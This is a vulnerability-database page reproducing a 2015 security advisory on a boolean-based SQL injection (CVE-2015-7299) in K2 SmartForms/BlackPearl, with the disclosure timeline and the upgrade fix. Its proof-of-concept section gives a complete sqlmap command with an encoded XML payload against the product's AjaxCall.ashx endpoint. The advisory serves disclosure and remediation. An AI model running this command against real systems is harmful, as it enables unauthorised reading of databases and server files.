Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

K2 SmartForms / BlackPearl SQL Injection

🗓️ 13 Oct 2015 00:00:00Reported by Wissam BashourType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 54 Views

Boolean-based SQL injection Vulnerability in K2 Platforms. Anonymously read sensitive data from the databas

Related
Code
ReporterTitlePublishedViews
Family
0day.today		K2 SmartForms / BlackPearl SQL Injection Vulnerability
13 Oct 201500:00
zdt
CNVD		Multiple K2 Products SQL Injection Vulnerabilities
26 Oct 201500:00
cnvd
CVE		CVE-2015-7299
21 Oct 201518:00
cve
Cvelist		CVE-2015-7299
21 Oct 201518:00
cvelist
EUVD		EUVD-2015-7228
7 Oct 202500:30
euvd
NVD		CVE-2015-7299
21 Oct 201518:59
nvd
Prion		Sql injection
21 Oct 201518:59
prion
securityvulns		Boolean-based SQL injection Vulnerability in K2 Platforms
26 Oct 201500:00
securityvulns
securityvulns		Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
26 Oct 201500:00
securityvulns
`Title: Boolean-based SQL injection Vulnerability in K2 Platforms.  
Author: Wissam Bashour - Help AG Middle East  
Vendor: K2  
Product: SmartForms, BlackPearl, K2 for sharepoint   
Version: 4.6.7  
Tested Version: Version 4.6.7  
Severity: HIGH  
CVE Reference: CVE-2015-7299  
  
# About the Product: K2 smartforms can pull and push information from line-of-business systems — SharePoint, CRM, SAP and others — and they can be used in the cloud with applications like Salesforce.com. The built-in K2 SmartObject technology allows true reusability of SmartForms components across multiple SmartForms, in multiple applications.  
  
  
# Description:   
This Boolean-based SQL injection vulnerability enables an anonymous attacker to read sensitive data from the database, and recover the content of a given file present on the DBMS file system.  
  
# Vulnerability Class:   
SQL injection - https://www.owasp.org/index.php/SQL_Injection)  
  
# How to Reproduce: (POC):  
Host the attached code in a webserver. Then go for the xml parameter that calls the AJAXCall.ashx in the smart object for the SharePoint.  
You can see that the parameter doesn’t sanitize SQL queries.   
  
# Disclosure:   
Discovered: September 20, 2015  
Vendor Notification: September 22, 2015  
Advisory Publication: October 13, 2015  
Public Disclosure: October 15, 2015  
  
# Solution:   
Upgrade to 4.6.10 or later will fix this issue.  
The new version number is 4.6.10 (4.12060.1690.2)  
Release date: June, 2015   
  
  
# credits:   
Wissam Bashour  
Associate Security Analyst  
Help AG Middle East  
  
# Proof of Concept Code:  
https://raw.githubusercontent.com/Siros96/Boolean-SQL-injection/master/PoC  
  
# Boolean-SQL-injection  
# this is the sqlmap code  
sqlmap --url="http://eforms.####/Runtime/Runtime/AjaxCall.ashx" --data="xml=%253Cbrokerpackage%253E%253Csmartobject%2520guid%253D%25227986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%2520resultname%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%253E%253Cmethod%2520name%253D%2522List%2522%253E%253CSorters%253E%253CSorter%2520OrderBy%253D%2522FirstName%2522%2520OrderByResultName%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%2520Direction%253D%2522ascending%2522%252F%253E%253C%252FSorters%253E%253Cfilter%253E%253CFilter%253E%253COr%253E%253CContains%253E%253CItem%2520SourceType%253D%2522ObjectProperty%2522%2520SourceID%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3.FirstName%2522%2520DataType%253D%2522Text%2522%253EFirstName%253C%252FItem%253E%253CItem%2520SourceType%253D%2522Value%2522%253E%253CSourceValue%253E*%253C%252FSourceValue%253E%253C%252FItem%253E%253C%252FContains%253E%253CContains%253E%253CItem%2520SourceType%253D%2522ObjectProperty%2522%2520SourceID%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3.LastName%2522%2520DataType%253D%2522Text%2522%253ELastName%253C%252FItem%253E%253CItem%2520SourceType%253D%2522Value%2522%253E%253CSourceValue%253E*%253C%252FSourceValue%253E%253C%252FItem%253E%253C%252FContains%253E%253C%252FOr%253E%253C%252FFilter%253E%253C%252Ffilter%253E%253C%252Fmethod%253E%253Cparameter%2520name%253D%2522jobtitleid%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cparameter%2520name%253D%2522departmentid%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cparameter%2520name%253D%2522divisionid%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cparameter%2520name%253D%2522employeeid_1%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cresults%253E%253CResult%2520SourceType%253D%2522Result%2522%2520SourceID%253D%25227986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%2520SourceInstanceID%253D%2522db445b19-c6b2-146a-6e30-9096a4cfd3ea%2522%2520TargetType%253D%2522Control%2522%2520TargetID%253D%2522db445b19-c6b2-146a-6e30-9096a4cfd3ea_41f4b785-0bc3-0ef6-2d81-25509c13c3bd%2522%2520TargetInstanceID%253D%2522db445b19-c6b2-146a-6e30-9096a4cfd3ea%2522%252F%253E%253C%252Fresults%253E%253C%252Fsmartobject%253E%253Cmetadata%253E%253Cid%253E9e06faa7-1d6b-48b9-960b-cd7e64c4b7d5%253C%252Fid%253E%253Cmethodexecuted%253EList%253C%252Fmethodexecuted%253E%253Ctypeofview%253ECapture%253C%252Ftypeofview%253E%253Cidofcontrol%253Edb445b19-c6b2-146a-6e30-9096a4cfd3ea_41f4b785-0bc3-0ef6-2d81-25509c13c3bd%253C%252Fidofcontrol%253E%253Cinstanceid%253Edb445b19-c6b2-146a-6e30-9096a4cfd3ea%253C%252Finstanceid%253E%253Cpagenumber%253E1%253C%252Fpagenumber%253E%253Cpagesize%253E10%253C%252Fpagesize%253E%253Cfieldbehaviorignoreresults%253Etrue%253C%252Ffieldbehaviorignoreresults%253E%253C%252Fmetadata%253E%253C%252Fbrokerpackage%253E" --auth-type=NTLM --auth-cred=###### --dbms="mssql"  
  
  
  
#References:  
[1] help AG middle East http://www.helpag.com/.  
[2] http://www.k2.com/  
[3] https://www.owasp.org/index.php/SQL_Injection  
[4] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Oct 2015 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.00549
k2 smartformsblackpearlsql injectionowaspdata breachdatabasevulnerabilitysecurity advisoryupgradeinformation disclosureproof of concept
54